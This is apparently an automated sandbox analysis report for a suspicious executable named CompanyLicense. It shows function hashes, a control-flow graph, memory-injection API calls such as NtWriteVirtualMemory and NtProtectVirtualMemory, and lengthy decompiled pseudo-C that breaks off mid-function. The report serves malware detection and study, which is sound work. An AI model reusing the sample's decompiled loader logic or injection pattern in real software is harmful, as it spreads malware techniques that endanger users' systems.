                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: MemoryVirtualWrite
                                      • String ID: j@h
                                      • API String ID: 3527976591-152121739
                                      • Opcode ID: f0489c132efb3c4c3632ff2253869e2e4291a68398b22ce6b5522cf3d581563d
                                      • Instruction ID: a3438612b0844dc57c9baff6f23025819aa1f9df72d3a78f216683e1c68f8197
                                      • Opcode Fuzzy Hash: f0489c132efb3c4c3632ff2253869e2e4291a68398b22ce6b5522cf3d581563d
                                      • Instruction Fuzzy Hash: 6E6133709086C91BDB230AB09C957C4FA76BF12B14F8411E8EED6471A2D7B26CB49BC1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A833C, Relevance: 1.8, APIs: 1, Instructions: 270COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 961 20a833c-20a847f call 20a6f5a * 2 call 20a3cde GetPEB 969 20a6f5a-20a6f62 961->969 970 20a8485-20a84c9 call 20a8b16 961->970 971 20a70a8-20a70ae LoadLibraryA call 20a70b7 969->971 972 20a6f68-20a706d call 20a7679 969->972 979 20a84cf-20a84d3 970->979 980 20a3cc1-20a3cc5 970->980 977 20a70b3-20a70b6 971->977 987 20a709b-20a70a5 call 20a70b7 972->987 988 20a706f-20a7080 972->988 981 20a84d9-20a863d 979->981 982 20a882f 979->982 983 20a3cc6-20a3cd7 980->983 994 20a8641-20a8644 981->994 983->983 986 20a3cd9-20a3cdb 983->986 987->971 990 20a08f9-20a090c call 20a08d5 988->990 991 20a7086-20a708f call 20a7679 988->991 991->987 1002 20a7091-20a7096 call 20a7679 991->1002 999 20a864a-20a864d 994->999 1000 20a8832-20a883a 994->1000 999->994 1003 20a864f-20a8655 999->1003 1001 20a883e-20a8841 1000->1001 1004 20a8847-20a884a 1001->1004 1005 20a89a5-20a89b5 1001->1005 1002->987 1003->994 1007 20a8657-20a865b 1003->1007 1004->1001 1010 20a884c-20a8850 1004->1010 1009 20a89b9-20a89bc 1005->1009 1007->994 1008 20a865d-20a8667 1007->1008 1011 20a866c-20a8676 1008->1011 1012 20a89be-20a89c4 1009->1012 1013 20a89fc-20a8b13 call 20a8b16 1009->1013 1010->1001 1014 20a8852-20a8856 1010->1014 1015 20a8678-20a8690 1011->1015 1016 20a8694-20a8696 1011->1016 1012->1009 1017 20a89c6-20a89ca 1012->1017 1014->1001 1018 20a8858-20a886a 1014->1018 1021 20a86a2-20a86a5 1015->1021 1020 20a8698-20a86a1 1016->1020 1016->1021 1017->1009 1022 20a89cc-20a89d0 1017->1022 1023 20a886f-20a8873 1018->1023 1020->1021 1026 20a86ab-20a86af 1021->1026 1027 20a87ed-20a87f0 1021->1027 1022->1009 1028 20a89d2-20a89de 1022->1028 1029 20a8895-20a889b 1023->1029 1030 20a8875-20a887b 1023->1030 1026->1027 1032 20a86b5-20a86c0 1026->1032 1034 20a881c-20a8822 1027->1034 1035 20a87f2-20a87f8 1027->1035 1033 20a89e3-20a89e7 1028->1033 1029->1023 1031 20a889d-20a899f call 20a8b16 1029->1031 1036 20a887d-20a8881 1030->1036 1037 20a8883-20a888b 1030->1037 1040 20a86c2-20a86c6 1032->1040 1041 20a89e9-20a89f3 1033->1041 1042 20a89f4-20a89fa 1033->1042 1034->1011 1038 20a8828-20a882a call 20a8b16 1034->1038 1035->1034 1043 20a87fa-20a880e 1035->1043 1036->1037 1044 20a888d-20a8894 1036->1044 1037->1029 1038->982 1040->1040 1047 20a86c8-20a86cd 1040->1047 1041->1042 1042->1013 1042->1033 1043->980 1048 20a8814-20a8819 1043->1048 1044->1029 1047->1040 1050 20a86cf-20a86d3 1047->1050 1048->1034 1050->1040 1051 20a86d5-20a87ea 1050->1051 1051->1027
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: LibraryLoadMemoryProtectVirtual
                                      • String ID:
                                      • API String ID: 3389902171-0
                                      • Opcode ID: f07c4a38a02e640674db6d00e88861aa41271732b4e2814bd281b95238dbc9f2
                                      • Instruction ID: d9aec43b9c047dbbf6b39cf10f5b4177a190cbbc2cbafc1c01cf3b56f080cad7
                                      • Opcode Fuzzy Hash: f07c4a38a02e640674db6d00e88861aa41271732b4e2814bd281b95238dbc9f2
                                      • Instruction Fuzzy Hash: 6FA1C770A043418EDF66DFB8C4E4B69BBD1EF52364F98C299D5958F2E6C7308442D722
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A38A7, Relevance: 1.6, APIs: 1, Instructions: 94nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtWriteVirtualMemory.NTDLL(?,?,?,00000000,?,68F644E8,?,68F644E4,00000000,68F644E8,00001000,00000040,?,?,?,68F644E4), ref: 020A399F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: MemoryVirtualWrite
                                      • String ID:
                                      • API String ID: 3527976591-0
                                      • Opcode ID: fd991257c4a5e320e936970340e0a2c83a4a89e81823c97a3842bac3e73971bb
                                      • Instruction ID: fbb2b3f4b3792aa7d60b3fd03b9dff350af9a37c6858273607ed613e5eef837f
                                      • Opcode Fuzzy Hash: fd991257c4a5e320e936970340e0a2c83a4a89e81823c97a3842bac3e73971bb
                                      • Instruction Fuzzy Hash: EE315E15C498CA07C72306B55895380FFB77F52924FC522E9ADEB03536D7622DB48BD2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A457E, Relevance: 1.6, APIs: 1, Instructions: 60libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LdrInitializeThunk.NTDLL(?,?,?,?,?,020A5210,020A555C,020A4170,020A0A81,?,6DDC21B5,6DDB9555,?,321C9581,?,020A8349), ref: 020A5095
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 96d63c1461a1ec93ccb9a9e02ac3323ec63332257b07016c0f5cd6546b93565d
                                      • Instruction ID: 6f28dadfc55ffe58c4192f1673c3c8607142c2cfcda9f5c66525344261aa4e14
                                      • Opcode Fuzzy Hash: 96d63c1461a1ec93ccb9a9e02ac3323ec63332257b07016c0f5cd6546b93565d
                                      • Instruction Fuzzy Hash: 41114A16C4D9C603C21202F5146A680FFB77D528347C961DD9DE60363BDB523E7597D2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A8B16, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,020A84C3,00000040,020A32BD,00000000,00000000,00000000,00000000,?,00000000,00000000,020A0719), ref: 020A8B2F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: MemoryProtectVirtual
                                      • String ID:
                                      • API String ID: 2706961497-0
                                      • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                      • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                                      • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                      • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004041A1, Relevance: 1.4, APIs: 1, Instructions: 166memoryCOMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E004041A1(void* __eax, void* __ebx, void* __edx, void* __edi) {
				void* _t166;
				void* _t195;

				_t166 = __edx;
				 *(_t195 + 0x38) =  *(_t195 + 0x38) ^ 0x00000000;
			}





                                      0x004041a1
                                      0x004041a2

                                      APIs
                                      • VirtualAlloc.KERNELBASE(00000000,0000E291,FFFFAE6D,FFFFFEF2), ref: 0040437B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: e734ab50ef0d3b0b1475db0e40835dd144fdd7e4d23f15578b9dae19fd963377
                                      • Instruction ID: 43209272c24a350b9e3e82cd8eec46b4dcdba6e778195234b4ba2ef0805891a2
                                      • Opcode Fuzzy Hash: e734ab50ef0d3b0b1475db0e40835dd144fdd7e4d23f15578b9dae19fd963377
                                      • Instruction Fuzzy Hash: 4E7199B2804218ABEBC49F34C58979A7BB0FF103A9FA66419FC8752191D7BD85C5CBC1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040E7AA, Relevance: 340.0, APIs: 182, Strings: 11, Instructions: 2220COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 56%
                                      			E0040E7AA(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				void* _v8;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v40;
				short _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				long long _v60;
				char _v64;
				long long _v72;
				void* _v88;
				short _v92;
				signed int _v96;
				void* _v112;
				signed int _v120;
				signed int _v124;
				char _v128;
				char _v132;
				char _v136;
				signed int _v140;
				char _v144;
				signed int _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v168;
				char _v176;
				intOrPtr _v184;
				char _v192;
				char _v200;
				char _v208;
				char* _v216;
				char _v224;
				char* _v232;
				intOrPtr _v240;
				intOrPtr _v248;
				intOrPtr _v256;
				char _v260;
				char _v264;
				char _v268;
				void* _v272;
				char _v276;
				char _v280;
				char _v284;
				char _v288;
				char _v292;
				intOrPtr _v296;
				char _v300;
				intOrPtr _v304;
				char _v308;
				signed int _v312;
				signed int _v316;
				intOrPtr* _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				intOrPtr* _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				char _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				intOrPtr* _v412;
				signed int _v416;
				signed int _v420;
				intOrPtr* _v424;
				signed int _v428;
				intOrPtr* _v432;
				signed int _v436;
				intOrPtr* _v440;
				signed int _v444;
				intOrPtr* _v448;
				signed int _v452;
				intOrPtr* _v456;
				signed int _v460;
				intOrPtr* _v464;
				signed int _v468;
				intOrPtr* _v472;
				signed int _v476;
				intOrPtr* _v480;
				signed int _v484;
				signed int _v488;
				intOrPtr* _v492;
				signed int _v496;
				intOrPtr* _v500;
				signed int _v504;
				intOrPtr* _v508;
				signed int _v512;
				intOrPtr* _v516;
				signed int _v520;
				intOrPtr* _v524;
				signed int _v528;
				intOrPtr* _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				intOrPtr* _v548;
				signed int _v552;
				intOrPtr* _v556;
				signed int _v560;
				intOrPtr* _v564;
				signed int _v568;
				signed int _v572;
				intOrPtr* _v576;
				signed int _v580;
				intOrPtr* _v584;
				signed int _v588;
				intOrPtr* _v592;
				signed int _v596;
				intOrPtr* _v600;
				signed int _v604;
				intOrPtr* _v608;
				signed int _v612;
				signed int _v616;
				intOrPtr* _v620;
				signed int _v624;
				intOrPtr* _v628;
				signed int _v632;
				intOrPtr* _v636;
				signed int _v640;
				intOrPtr* _v644;
				signed int _v648;
				intOrPtr* _v652;
				signed int _v656;
				intOrPtr* _v660;
				signed int _v664;
				intOrPtr* _v668;
				signed int _v672;
				intOrPtr* _v676;
				signed int _v680;
				intOrPtr* _v684;
				signed int _v688;
				signed int _v692;
				intOrPtr* _v696;
				signed int _v700;
				intOrPtr* _v704;
				signed int _v708;
				signed int _v712;
				intOrPtr* _v716;
				signed int _v720;
				intOrPtr* _v724;
				signed int _v728;
				signed int _v732;
				signed int _v736;
				signed int _t1111;
				signed int _t1118;
				signed int _t1126;
				signed int _t1130;
				char* _t1134;
				signed int _t1138;
				signed int _t1143;
				signed int _t1147;
				signed int _t1166;
				signed int _t1170;
				signed int* _t1175;
				signed int _t1179;
				signed int _t1183;
				signed int _t1187;
				signed int _t1192;
				signed int _t1196;
				char* _t1200;
				signed int _t1204;
				char* _t1206;
				char* _t1209;
				signed int _t1219;
				signed int _t1233;
				signed int _t1237;
				char* _t1241;
				signed int _t1245;
				signed int _t1249;
				signed int _t1253;
				signed int _t1257;
				signed int _t1261;
				char* _t1266;
				signed int _t1270;
				signed int _t1274;
				signed int _t1278;
				char* _t1283;
				signed int _t1289;
				signed int _t1304;
				signed int _t1309;
				signed int _t1313;
				char* _t1317;
				signed int _t1321;
				signed int _t1325;
				signed int _t1329;
				signed int _t1337;
				signed int _t1344;
				signed int _t1348;
				char* _t1352;
				signed int _t1356;
				signed int _t1360;
				signed int _t1364;
				signed int _t1368;
				signed int _t1372;
				char* _t1376;
				signed int _t1380;
				signed int _t1393;
				signed int _t1409;
				signed int _t1413;
				signed int* _t1418;
				signed int _t1422;
				signed int _t1426;
				signed int _t1430;
				signed int _t1434;
				signed int _t1438;
				char* _t1442;
				signed int _t1446;
				signed int _t1451;
				signed int _t1455;
				char* _t1458;
				char* _t1460;
				signed int _t1481;
				signed int _t1485;
				char* _t1489;
				signed int _t1493;
				signed int _t1497;
				signed int _t1501;
				signed int _t1515;
				signed int _t1524;
				signed int _t1528;
				char* _t1532;
				signed int _t1536;
				signed int _t1543;
				signed int _t1550;
				signed int _t1554;
				char* _t1558;
				signed int _t1562;
				signed int _t1570;
				signed int _t1575;
				void* _t1583;
				signed int _t1587;
				signed int _t1591;
				char* _t1596;
				char* _t1608;
				intOrPtr _t1671;
				intOrPtr _t1712;
				signed int* _t1720;
				void* _t1756;
				void* _t1758;
				intOrPtr* _t1759;
				intOrPtr* _t1760;
				void* _t1762;
				void* _t1763;
				void* _t1764;
				void* _t1766;
				void* _t1767;
				void* _t1769;
				void* _t1770;
				void* _t1772;
				void* _t1773;
				void* _t1774;
				void* _t1776;
				long long* _t1777;
				long long* _t1778;

				_t1759 = _t1758 - 0x18;
				 *[fs:0x0] = _t1759;
				L004012E0();
				_v28 = _t1759;
				_v24 = 0x401128;
				_v20 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012e6, _t1756);
				_v8 = 1;
				_v8 = 2;
				_push( &_v176);
				L00401442();
				_v216 = L"udsanering";
				_v224 = 0x8008;
				_push( &_v176);
				_t1111 =  &_v224;
				_push(_t1111);
				L00401448();
				_v312 = _t1111;
				_t1596 =  &_v176;
				L0040143C();
				if(_v312 != 0) {
					_v8 = 3;
					if( *0x413010 != 0) {
						_v412 = 0x413010;
					} else {
						_push(0x413010);
						_push(0x402b8c);
						L0040142A();
						_v412 = 0x413010;
					}
					_t1587 =  &_v132;
					L00401430();
					_v312 = _t1587;
					_t1591 =  *((intOrPtr*)( *_v312 + 0x158))(_v312,  &_v120, _t1587,  *((intOrPtr*)( *((intOrPtr*)( *_v412)) + 0x300))( *_v412));
					asm("fclex");
					_v316 = _t1591;
					if(_v316 >= 0) {
						_v416 = _v416 & 0x00000000;
					} else {
						_push(0x158);
						_push(0x403ac4);
						_push(_v312);
						_push(_v316);
						L0040145A();
						_v416 = _t1591;
					}
					_v384 = _v120;
					_v120 = _v120 & 0x00000000;
					_v168 = _v384;
					_v176 = 8;
					_push( &_v176);
					L00401436();
					L0040144E();
					_t1596 =  &_v176;
					L0040143C();
				}
				_v8 = 5;
				_v232 = L"SMAAKRAVLET";
				_v240 = 8;
				_v168 = 0x46bb55;
				_v176 = 3;
				_v276 = 0x770254;
				 *_t1759 =  *0x4011f8;
				L004012E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1118 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v276, 0x15f3f,  &_v176, 0x10, _t1596);
				_v312 = _t1118;
				if(_v312 >= 0) {
					_v420 = _v420 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x403918);
					_push(_a4);
					_push(_v312);
					L0040145A();
					_v420 = _t1118;
				}
				L0040143C();
				_v8 = 6;
				 *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v300);
				_v72 = _v300;
				_v8 = 7;
				if( *0x413010 != 0) {
					_v424 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v424 = 0x413010;
				}
				_t1126 =  &_v132;
				L00401430();
				_v312 = _t1126;
				_t1130 =  *((intOrPtr*)( *_v312 + 0x78))(_v312,  &_v276, _t1126,  *((intOrPtr*)( *((intOrPtr*)( *_v424)) + 0x304))( *_v424));
				asm("fclex");
				_v316 = _t1130;
				if(_v316 >= 0) {
					_v428 = _v428 & 0x00000000;
				} else {
					_push(0x78);
					_push(0x403ac4);
					_push(_v312);
					_push(_v316);
					L0040145A();
					_v428 = _t1130;
				}
				if( *0x413010 != 0) {
					_v432 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v432 = 0x413010;
				}
				_t1134 =  &_v136;
				L00401430();
				_v320 = _t1134;
				_t1138 =  *((intOrPtr*)( *_v320 + 0x130))(_v320,  &_v140, _t1134,  *((intOrPtr*)( *((intOrPtr*)( *_v432)) + 0x30c))( *_v432));
				asm("fclex");
				_v324 = _t1138;
				if(_v324 >= 0) {
					_v436 = _v436 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x403ac4);
					_push(_v320);
					_push(_v324);
					L0040145A();
					_v436 = _t1138;
				}
				_push(0);
				_push(0);
				_push(_v140);
				_push( &_v192); // executed
				L00401424(); // executed
				_t1760 = _t1759 + 0x10;
				if( *0x413010 != 0) {
					_v440 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v440 = 0x413010;
				}
				_t1143 =  &_v144;
				L00401430();
				_v328 = _t1143;
				_t1147 =  *((intOrPtr*)( *_v328 + 0x118))(_v328,  &_v280, _t1143,  *((intOrPtr*)( *((intOrPtr*)( *_v440)) + 0x300))( *_v440));
				asm("fclex");
				_v332 = _t1147;
				if(_v332 >= 0) {
					_v444 = _v444 & 0x00000000;
				} else {
					_push(0x118);
					_push(0x403ac4);
					_push(_v328);
					_push(_v332);
					L0040145A();
					_v444 = _t1147;
				}
				_v300 =  *0x4011f0;
				_v288 = 0x5f3676;
				L00401418();
				L0040141E();
				_v284 =  *0x4011e8;
				_v216 = L"BEMISTED";
				_v224 = 8;
				_t1608 =  &_v176;
				L00401412();
				_t144 =  &_v288; // 0x5f3676
				 *_t1760 = _v276;
				_v192 =  *0x4011e0;
				 *((intOrPtr*)( *_a4 + 0x728))(_a4, 0x5da19910, 0x5afc,  &_v176, _t1608, _t1608,  &_v284, _t1608,  &_v120, _v280, _t144,  &_v300, 0x7259,  &_v192);
				L0040140C();
				_push( &_v140);
				_push( &_v144);
				_push( &_v136);
				_push( &_v132);
				_push(4);
				L00401406();
				_push( &_v192);
				_push( &_v176);
				_push(2);
				L00401400();
				_t1762 = _t1760 + 0x20;
				_v8 = 8;
				if( *0x413010 != 0) {
					_v448 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v448 = 0x413010;
				}
				_t1166 =  &_v132;
				L00401430();
				_v312 = _t1166;
				_t1170 =  *((intOrPtr*)( *_v312 + 0xf8))(_v312,  &_v136, _t1166,  *((intOrPtr*)( *((intOrPtr*)( *_v448)) + 0x2fc))( *_v448));
				asm("fclex");
				_v316 = _t1170;
				if(_v316 >= 0) {
					_v452 = _v452 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x403ac4);
					_push(_v312);
					_push(_v316);
					L0040145A();
					_v452 = _t1170;
				}
				_push(0);
				_push(0);
				_push(_v136);
				_push( &_v176);
				L00401424();
				_t1763 = _t1762 + 0x10;
				if( *0x413010 != 0) {
					_v456 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v456 = 0x413010;
				}
				_t1175 =  &_v140;
				L00401430();
				_v320 = _t1175;
				_t1179 =  *((intOrPtr*)( *_v320 + 0x158))(_v320,  &_v120, _t1175,  *((intOrPtr*)( *((intOrPtr*)( *_v456)) + 0x30c))( *_v456));
				asm("fclex");
				_v324 = _t1179;
				if(_v324 >= 0) {
					_v460 = _v460 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x403ac4);
					_push(_v320);
					_push(_v324);
					L0040145A();
					_v460 = _t1179;
				}
				if( *0x413010 != 0) {
					_v464 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v464 = 0x413010;
				}
				_t1183 =  &_v144;
				L00401430();
				_v328 = _t1183;
				_t1187 =  *((intOrPtr*)( *_v328 + 0x160))(_v328,  &_v148, _t1183,  *((intOrPtr*)( *((intOrPtr*)( *_v464)) + 0x300))( *_v464));
				asm("fclex");
				_v332 = _t1187;
				if(_v332 >= 0) {
					_v468 = _v468 & 0x00000000;
				} else {
					_push(0x160);
					_push(0x403ac4);
					_push(_v328);
					_push(_v332);
					L0040145A();
					_v468 = _t1187;
				}
				_push(0);
				_push(0);
				_push(_v148);
				_push( &_v208);
				L00401424();
				_t1764 = _t1763 + 0x10;
				if( *0x413010 != 0) {
					_v472 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v472 = 0x413010;
				}
				_t1192 =  &_v152;
				L00401430();
				_v336 = _t1192;
				_t1196 =  *((intOrPtr*)( *_v336 + 0x158))(_v336,  &_v124, _t1192,  *((intOrPtr*)( *((intOrPtr*)( *_v472)) + 0x304))( *_v472));
				asm("fclex");
				_v340 = _t1196;
				if(_v340 >= 0) {
					_v476 = _v476 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x403ac4);
					_push(_v336);
					_push(_v340);
					L0040145A();
					_v476 = _t1196;
				}
				if( *0x413010 != 0) {
					_v480 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v480 = 0x413010;
				}
				_t1200 =  &_v156;
				L00401430();
				_v344 = _t1200;
				_t1204 =  *((intOrPtr*)( *_v344 + 0x80))(_v344,  &_v276, _t1200,  *((intOrPtr*)( *((intOrPtr*)( *_v480)) + 0x308))( *_v480));
				asm("fclex");
				_v348 = _t1204;
				if(_v348 >= 0) {
					_v484 = _v484 & 0x00000000;
				} else {
					_push(0x80);
					_push(0x403ac4);
					_push(_v344);
					_push(_v348);
					L0040145A();
					_v484 = _t1204;
				}
				_v292 = _v276;
				_v288 = 0x84ac3;
				_v388 = _v124;
				_v124 = _v124 & 0x00000000;
				L0040141E();
				_t1206 =  &_v208;
				L004013FA();
				_v284 = _t1206;
				_v392 = _v120;
				_v120 = _v120 & 0x00000000;
				_v184 = _v392;
				_v192 = 8;
				_t1209 =  &_v176;
				L004013FA();
				_v280 = _t1209;
				_v216 = L"Tilsjoflingerne9";
				_v224 = 8;
				L004012E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1219 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4, 0x703af6, 0x56b32da0, 0x5b04, 0x10,  &_v280,  &_v192,  &_v284,  &_v128,  &_v288,  &_v292, _t1209, _t1206);
				_v352 = _t1219;
				if(_v352 >= 0) {
					_v488 = _v488 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x403918);
					_push(_a4);
					_push(_v352);
					L0040145A();
					_v488 = _t1219;
				}
				L0040140C();
				_push( &_v148);
				_push( &_v136);
				_push( &_v156);
				_push( &_v152);
				_push( &_v144);
				_push( &_v140);
				_push( &_v132);
				_push(7);
				L00401406();
				_push( &_v208);
				_push( &_v192);
				_push( &_v176);
				_push(3);
				L00401400();
				_t1766 = _t1764 + 0x30;
				_v8 = 9;
				if( *0x413010 != 0) {
					_v492 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v492 = 0x413010;
				}
				_t1233 =  &_v132;
				L00401430();
				_v312 = _t1233;
				_t1237 =  *((intOrPtr*)( *_v312 + 0x60))(_v312,  &_v276, _t1233,  *((intOrPtr*)( *((intOrPtr*)( *_v492)) + 0x308))( *_v492));
				asm("fclex");
				_v316 = _t1237;
				if(_v316 >= 0) {
					_v496 = _v496 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x403ac4);
					_push(_v312);
					_push(_v316);
					L0040145A();
					_v496 = _t1237;
				}
				if( *0x413010 != 0) {
					_v500 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v500 = 0x413010;
				}
				_t1241 =  &_v136;
				L00401430();
				_v320 = _t1241;
				_t1245 =  *((intOrPtr*)( *_v320 + 0x60))(_v320,  &_v280, _t1241,  *((intOrPtr*)( *((intOrPtr*)( *_v500)) + 0x308))( *_v500));
				asm("fclex");
				_v324 = _t1245;
				if(_v324 >= 0) {
					_v504 = _v504 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x403ac4);
					_push(_v320);
					_push(_v324);
					L0040145A();
					_v504 = _t1245;
				}
				if( *0x413010 != 0) {
					_v508 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v508 = 0x413010;
				}
				_t1249 =  &_v140;
				L00401430();
				_v328 = _t1249;
				_t1253 =  *((intOrPtr*)( *_v328 + 0x138))(_v328,  &_v284, _t1249,  *((intOrPtr*)( *((intOrPtr*)( *_v508)) + 0x300))( *_v508));
				asm("fclex");
				_v332 = _t1253;
				if(_v332 >= 0) {
					_v512 = _v512 & 0x00000000;
				} else {
					_push(0x138);
					_push(0x403ac4);
					_push(_v328);
					_push(_v332);
					L0040145A();
					_v512 = _t1253;
				}
				if( *0x413010 != 0) {
					_v516 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v516 = 0x413010;
				}
				_t1257 =  &_v144;
				L00401430();
				_v336 = _t1257;
				_t1261 =  *((intOrPtr*)( *_v336 + 0x130))(_v336,  &_v148, _t1257,  *((intOrPtr*)( *((intOrPtr*)( *_v516)) + 0x300))( *_v516));
				asm("fclex");
				_v340 = _t1261;
				if(_v340 >= 0) {
					_v520 = _v520 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x403ac4);
					_push(_v336);
					_push(_v340);
					L0040145A();
					_v520 = _t1261;
				}
				_push(0);
				_push(0);
				_push(_v148);
				_push( &_v192);
				L00401424();
				_t1767 = _t1766 + 0x10;
				if( *0x413010 != 0) {
					_v524 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v524 = 0x413010;
				}
				_t1266 =  &_v152;
				L00401430();
				_v344 = _t1266;
				_t1270 =  *((intOrPtr*)( *_v344 + 0x118))(_v344,  &_v288, _t1266,  *((intOrPtr*)( *((intOrPtr*)( *_v524)) + 0x30c))( *_v524));
				asm("fclex");
				_v348 = _t1270;
				if(_v348 >= 0) {
					_v528 = _v528 & 0x00000000;
				} else {
					_push(0x118);
					_push(0x403ac4);
					_push(_v344);
					_push(_v348);
					L0040145A();
					_v528 = _t1270;
				}
				if( *0x413010 != 0) {
					_v532 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v532 = 0x413010;
				}
				_t1274 =  &_v156;
				L00401430();
				_v352 = _t1274;
				_t1278 =  *((intOrPtr*)( *_v352 + 0x178))(_v352,  &_v260, _t1274,  *((intOrPtr*)( *((intOrPtr*)( *_v532)) + 0x30c))( *_v532));
				asm("fclex");
				_v356 = _t1278;
				if(_v356 >= 0) {
					_v536 = _v536 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x403ac4);
					_push(_v352);
					_push(_v356);
					L0040145A();
					_v536 = _t1278;
				}
				_v200 = _v288;
				_v208 = 3;
				_v168 = _v284;
				_v176 = 3;
				_v216 = 0x2248ba;
				_v224 = 3;
				_v300 = 0x4edcc010;
				_v296 = 0x5af4;
				_t1283 =  &_v192;
				L00401418();
				L0040141E();
				L004012E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1289 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v300, _v276, _v280, 0x10,  &_v176, _t1283, _t1283,  &_v208, _v260,  &_v264);
				_v360 = _t1289;
				if(_v360 >= 0) {
					_v540 = _v540 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x403918);
